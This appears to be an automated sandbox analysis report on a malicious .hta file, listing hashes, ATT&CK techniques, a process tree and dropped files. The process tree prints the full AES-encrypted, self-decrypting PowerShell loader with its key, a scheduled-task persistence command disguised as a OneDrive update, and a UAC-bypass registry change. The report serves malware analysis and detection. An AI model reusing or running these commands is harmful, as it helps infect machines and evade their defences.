caa7a7501033b47395d0ee421464618b7777ce2a798111e29b47267b778d5fc7

Analysis

max time kernel
144s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20231222-en
resource tags

arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
submitted
13-02-2024 05:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

caa7a7501033b47395d0ee421464618b7777ce2a798111e29b47267b778d5fc7.hta
Size

76KB
MD5

7e08e28d64e2026b8325935172c27c6b
SHA1

3be2858857ffba56416db3001a4f9a382a7404ec
SHA256

caa7a7501033b47395d0ee421464618b7777ce2a798111e29b47267b778d5fc7
SHA512

816dd4906b26ac9fdaed836ca273588cac0d807868934715d500c3a9f8ad31bd11020d3a589d016a1c60c93fe714602f45963e78932b36ae1fa4cc54048190e9
SSDEEP

768:H0nzwRQmH5omBvaGGZFD9lu2drSX0kUG39UaZd4xJk0sS7:AzwGmHfBsZFDfu2dmX0kUmU/uS7

Score

10^/10

evasion trojan

Malware Config

Signatures

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	powershell.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
3	1508	powershell.exe
14	1508	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation	mshta.exe

Executes dropped EXE 2 IoCs

pid	Process
116	tiago.exe
3308	tiago.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4292	schtasks.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 28 IoCs

pid	Process
4948	powershell.exe
4948	powershell.exe
1508	powershell.exe
1508	powershell.exe
1068	powershell.exe
1068	powershell.exe
3476	AcroRd32.exe
3476	AcroRd32.exe
3476	AcroRd32.exe
3476	AcroRd32.exe
3476	AcroRd32.exe
3476	AcroRd32.exe
3476	AcroRd32.exe
3476	AcroRd32.exe
3476	AcroRd32.exe
3476	AcroRd32.exe
3476	AcroRd32.exe
3476	AcroRd32.exe
3476	AcroRd32.exe
3476	AcroRd32.exe
3476	AcroRd32.exe
3476	AcroRd32.exe
3476	AcroRd32.exe
3476	AcroRd32.exe
3476	AcroRd32.exe
3476	AcroRd32.exe
116	tiago.exe
3308	tiago.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4948	powershell.exe
Token: SeDebugPrivilege	1508	powershell.exe
Token: SeDebugPrivilege	1068	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3476	AcroRd32.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
3476	AcroRd32.exe
3476	AcroRd32.exe
3476	AcroRd32.exe
3476	AcroRd32.exe
3476	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4384 wrote to memory of 4948	4384	mshta.exe	83
PID 4384 wrote to memory of 4948	4384	mshta.exe	83
PID 4384 wrote to memory of 4948	4384	mshta.exe	83
PID 4948 wrote to memory of 1508	4948	powershell.exe	85
PID 4948 wrote to memory of 1508	4948	powershell.exe	85
PID 4948 wrote to memory of 1508	4948	powershell.exe	85
PID 1508 wrote to memory of 3476	1508	powershell.exe	86
PID 1508 wrote to memory of 3476	1508	powershell.exe	86
PID 1508 wrote to memory of 3476	1508	powershell.exe	86
PID 1508 wrote to memory of 1068	1508	powershell.exe	88
PID 1508 wrote to memory of 1068	1508	powershell.exe	88
PID 1508 wrote to memory of 1068	1508	powershell.exe	88
PID 1068 wrote to memory of 4292	1068	powershell.exe	89
PID 1068 wrote to memory of 4292	1068	powershell.exe	89
PID 1068 wrote to memory of 4292	1068	powershell.exe	89
PID 3476 wrote to memory of 2272	3476	AcroRd32.exe	92
PID 3476 wrote to memory of 2272	3476	AcroRd32.exe	92
PID 3476 wrote to memory of 2272	3476	AcroRd32.exe	92
PID 2272 wrote to memory of 2352	2272	RdrCEF.exe	95
PID 2272 wrote to memory of 2352	2272	RdrCEF.exe	95
PID 2272 wrote to memory of 2352	2272	RdrCEF.exe	95
PID 2272 wrote to memory of 2352	2272	RdrCEF.exe	95
PID 2272 wrote to memory of 2352	2272	RdrCEF.exe	95
PID 2272 wrote to memory of 2352	2272	RdrCEF.exe	95
PID 2272 wrote to memory of 2352	2272	RdrCEF.exe	95
PID 2272 wrote to memory of 2352	2272	RdrCEF.exe	95
PID 2272 wrote to memory of 2352	2272	RdrCEF.exe	95
PID 2272 wrote to memory of 2352	2272	RdrCEF.exe	95
PID 2272 wrote to memory of 2352	2272	RdrCEF.exe	95
PID 2272 wrote to memory of 2352	2272	RdrCEF.exe	95
PID 2272 wrote to memory of 2352	2272	RdrCEF.exe	95
PID 2272 wrote to memory of 2352	2272	RdrCEF.exe	95
PID 2272 wrote to memory of 2352	2272	RdrCEF.exe	95
PID 2272 wrote to memory of 2352	2272	RdrCEF.exe	95
PID 2272 wrote to memory of 2352	2272	RdrCEF.exe	95
PID 2272 wrote to memory of 2352	2272	RdrCEF.exe	95
PID 2272 wrote to memory of 2352	2272	RdrCEF.exe	95
PID 2272 wrote to memory of 2352	2272	RdrCEF.exe	95
PID 2272 wrote to memory of 2352	2272	RdrCEF.exe	95
PID 2272 wrote to memory of 2352	2272	RdrCEF.exe	95
PID 2272 wrote to memory of 2352	2272	RdrCEF.exe	95
PID 2272 wrote to memory of 2352	2272	RdrCEF.exe	95
PID 2272 wrote to memory of 2352	2272	RdrCEF.exe	95
PID 2272 wrote to memory of 2352	2272	RdrCEF.exe	95
PID 2272 wrote to memory of 2352	2272	RdrCEF.exe	95
PID 2272 wrote to memory of 2352	2272	RdrCEF.exe	95
PID 2272 wrote to memory of 2352	2272	RdrCEF.exe	95
PID 2272 wrote to memory of 2352	2272	RdrCEF.exe	95
PID 2272 wrote to memory of 2352	2272	RdrCEF.exe	95
PID 2272 wrote to memory of 2352	2272	RdrCEF.exe	95
PID 2272 wrote to memory of 2352	2272	RdrCEF.exe	95
PID 2272 wrote to memory of 2352	2272	RdrCEF.exe	95
PID 2272 wrote to memory of 2352	2272	RdrCEF.exe	95
PID 2272 wrote to memory of 2352	2272	RdrCEF.exe	95
PID 2272 wrote to memory of 2352	2272	RdrCEF.exe	95
PID 2272 wrote to memory of 2352	2272	RdrCEF.exe	95
PID 2272 wrote to memory of 2352	2272	RdrCEF.exe	95
PID 2272 wrote to memory of 2352	2272	RdrCEF.exe	95
PID 2272 wrote to memory of 2352	2272	RdrCEF.exe	95
PID 2272 wrote to memory of 4448	2272	RdrCEF.exe	96
PID 2272 wrote to memory of 4448	2272	RdrCEF.exe	96
PID 2272 wrote to memory of 4448	2272	RdrCEF.exe	96
PID 2272 wrote to memory of 4448	2272	RdrCEF.exe	96
PID 2272 wrote to memory of 4448	2272	RdrCEF.exe	96

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\caa7a7501033b47395d0ee421464618b7777ce2a798111e29b47267b778d5fc7.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4384
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $SNTyz = 'AAAAAAAAAAAAAAAAAAAAALmk2b6lObDopuf9qJWqGCtzC7CpptCgBnt5rHGdK0CvSJKhFnvqJYIoDdgjV85+2qtRocrUk9BcXKKoE9JsNJgtMBltspO1u78Mfl7YMlQ0P6ZscPVex7HSoCRP10vd0aIFQ1RIYahKuYd6bdmAphNVCCPHUBzYTI7VBNdM83D7XZFoec+s23GTfZWtuLYtYiS/OTUEzlhOwnMxN3sP2n8EbAo9BGzEBkxFbuCbhHyPb0i1m4H+rOtXNkftKSWiPM4ZXhtfLWDXCtqRIJhHmHUZErlqLgiNahl0E0q5FgZZm7OPmMEoMyuXzOzt1+cRrN1Ctv6HcMAYuAhBzws+/DaLNhYS+WE4CDQVfS8Ok13+MLPrzW7O9DoG3TCRFMLBTGp+78w993AYJtFm12crbdAyk79fGa6dn8PRunfMPiXcbyo2OkAJQE/5Sd5Qu6Wk7Dmxy98RYGde8kwD9ip5r7gf6c1124Am/BEazQnaTet4zRGw963Te9Jey/4OUUf7n/wQFzO68GOZebttJyOyf7t0YP+Phce1GZBsIMJ8r/OAa1QCgIBQ3bvh+Wb7pC4r1Bu+UgwFMnLY+oWJUr3sUMzcwoEDJylcmUbX1Usq77b1fKmB201lgyr0PKGLEt3IORnPBhTD81gOlFbkTg2IfcheTlv3Xu9kzvd3D0LOjJ6UHpKh1u7DWwC4qflR5AUIjGX81KrOdsIj4I8cSzvTEUbFoOe/Merccz3NEtk5Aq1z0o9g5fFuBaXQvrhGFkyOkdNFzRiCJEGtBWCt4ssADBmv0Mp4PLNrPGKQ+GKQNdRRdnRYWVcdDlQjvqRQoSBqMbb0RVi1bkQLcO0ZooLIzLbzcmwfgDvTyVCk2p/3p5mAhvJIGg+WcG7kH76z2nvrBGoVqQUzcEx6MvAzDXDb/VDkrzZz5DN6h42PvwxThFmO926dcbjgZUumX1jUcIsr+Cm4IQxjQnyZAscmjTeJ4WKfIU3zpS5dKT2LTLVjDxVUzzqlTmd/rBgzYJcQl1dlkMzxPLgnpQq/Pwf3+iGIYoW6TLrCGfenlPxiURCdq0ejJLKErJg0tIF+CxtB+v3FETsTyH0UkR5J3TwQjZHsgGZFNQLNnkBTwpdQAOsdW+LTRyRcION9/NP5yk3ZQHcSQeiNfbC4vS8iCRrjSR31swF/MC7PANy+yO7STigHV+6S5OCbKezZXAWlClJUP+G0Zg==';$NYvzm = 'dE92WmpUelNoc1NyUHdadGdKY1lsaHNuQWxvanpYdVg=';$JxlzVEaB = New-Object 'System.Security.Cryptography.AesManaged';$JxlzVEaB.Mode = [System.Security.Cryptography.CipherMode]::ECB;$JxlzVEaB.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$JxlzVEaB.BlockSize = 128;$JxlzVEaB.KeySize = 256;$JxlzVEaB.Key = [System.Convert]::FromBase64String($NYvzm);$CcxpA = [System.Convert]::FromBase64String($SNTyz);$cnnQFgZm = $CcxpA[0..15];$JxlzVEaB.IV = $cnnQFgZm;$LEiiXZOgN = $JxlzVEaB.CreateDecryptor();$AcOIkQZxG = $LEiiXZOgN.TransformFinalBlock($CcxpA, 16, $CcxpA.Length - 16);$JxlzVEaB.Dispose();$BMBI = New-Object System.IO.MemoryStream( , $AcOIkQZxG );$mZNCUMQO = New-Object System.IO.MemoryStream;$NPwQahcaV = New-Object System.IO.Compression.GzipStream $BMBI, ([IO.Compression.CompressionMode]::Decompress);$NPwQahcaV.CopyTo( $mZNCUMQO );$NPwQahcaV.Close();$BMBI.Close();[byte[]] $kiEmVbL = $mZNCUMQO.ToArray();$tsWNTzTK = [System.Text.Encoding]::UTF8.GetString($kiEmVbL);$tsWNTzTK | powershell -
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4948
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
    3⤵
    - UAC bypass
    - Blocklisted process makes network request
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1508
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\sample.pdf"
      4⤵
      Checks processor information in registry
      Modifies Internet Explorer settings
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:3476
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2272
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=3199C792802CF824A6F4ECD60A8ECA48 --mojo-platform-channel-handle=1748 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        6⤵
        
        PID:2352
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=DAF59BAB6D217195CBB62C05D3C09DEF --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=DAF59BAB6D217195CBB62C05D3C09DEF --renderer-client-id=2 --mojo-platform-channel-handle=1756 --allow-no-sandbox-job /prefetch:1
        6⤵
        
        PID:4448
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=6BF8407FABD71F6611D2881AF278E912 --mojo-platform-channel-handle=2284 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        6⤵
        
        PID:396
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=B22A403EBBDAC90C572E1A637A5B4B19 --mojo-platform-channel-handle=2436 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        6⤵
        
        PID:1808
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=3D9455E25C9AD95A1C6CFF76532B4CB3 --mojo-platform-channel-handle=2332 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        6⤵
        
        PID:4748
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=2D5360881660B7462CDB2B94294EEF19 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=2D5360881660B7462CDB2B94294EEF19 --renderer-client-id=7 --mojo-platform-channel-handle=2612 --allow-no-sandbox-job /prefetch:1
        6⤵
        
        PID:1212
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks.exe /TN 'MicrosoftOneDriveUpdateTaskMachine' /CREATE /F /TR C:\Users\Admin\AppData\Roaming\tiago.exe /SC ONLOGON
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1068
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /TN MicrosoftOneDriveUpdateTaskMachine /CREATE /F /TR C:\Users\Admin\AppData\Roaming\tiago.exe /SC ONLOGON
        5⤵
        Creates scheduled task(s)
        
        PID:4292
  - - C:\Users\Admin\AppData\Roaming\tiago.exe
      "C:\Users\Admin\AppData\Roaming\tiago.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:116
    - - C:\Users\Admin\AppData\Roaming\tiago.exe
        
        C:\Users\Admin\AppData\Roaming\tiago.exe
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:3308

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Scheduled Task/Job

T1053

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
56KB

MD5
c26ed30e7d5ab440480838636efc41db

SHA1
c66e0d00b56abebfb60d2fcc5cf85ad31a0d6591

SHA256
6a3c5c4a8e57f77ecc22078fbf603ecc31fb82d429bd87b7b4b9261447092aef

SHA512
96cdb78bca3e01d4513c31661987e5646e6a8ff24708918aa0d66dfa3ca5d98af4862c9f38c4f41f933c345d2d3adfb1d34d1430b33f45f916f41a9872a030df

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
56KB

MD5
752a1f26b18748311b691c7d8fc20633

SHA1
c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

SHA256
111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

SHA512
a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
64KB

MD5
cdb83c9eda6821e7e801eee95a6cc23c

SHA1
9e1a71438cc40c67c85b5fef14508543a168eb8e

SHA256
b0eff03ba61c333fdeead3d28cda08ed8c92fdf4e1d20466ed1ad1f25dcff7c0

SHA512
cd8a198c42584c2259f4b3b014979b64344b670322945513700f807d4357acdfefbc4f3b4ab3bb471f43559c0cce221659bb65fa6e4d69ae32f797e8229dcb30

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
760c8e4851eb7f32d5732dee3b28b71d

SHA1
9627551cd695412503ccacd085ce3b1a6c317bf9

SHA256
0ae6b399f68bf878d22df2c6d84a7d8df9483b3456f7754f1cace93a02e9100a

SHA512
9d2e8e6e0f1db096e5853a336066af21a9e3ab5881b514d02ce98a81f3535b8ea26c9fa3eab0b8f7f4c61d230190eae93e11641de0fac1fbcef5386a6bc5717d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
5f431d45670af785b50662fa50e15a93

SHA1
b6493dea6aab763b82a89101060010aaa93bf8d2

SHA256
92d73e1cf0f14a6179615aee8fcdcc800eb82d4d06fbe0d121ac76720b6d6cd8

SHA512
00b761eaaa58027a6b8a1d926a90b66bbc218e648ff34368422720b68a6358917d0faf58de5794fd6b6be6b6158a24d6fa6a1aa3725c84a7905d201cd0517aea

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
13KB

MD5
26b22de62b3c9ea61f65c6905b907db0

SHA1
28f7f5d5fca5c6b936c8186521a59f5be97063b7

SHA256
26bad1488d55b5efb1f56ae9b5707debc7ca40575bb5d93ecc4815a3c2c8debd

SHA512
3305a36b5662e383c9003fdd9ce02f1cff7a842ae451437a870ebc3e047ecdffb11134949b2b10f7f53c3f35a49040e18d5cfc697f0fcfc8e745a1e91cb4a484

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fcul2q45.2mg.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
6KB

MD5
e10fde38290aab5142058f8b88d2b15f

SHA1
f698a450688d5dc9f34d49044acf870480d6f263

SHA256
a77f62eccc6ad4d981644ad4124a94ee61e55b4fbcc1ce9d5f456af86cae4b48

SHA512
5a01224efee94cf2cfd0122d0063b25338b536e2dda7dfb82b438eed09bb331cff25d7a129f546adbe41e9d9207197eeebb0919c136038a42a43910843269c27

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
6KB

MD5
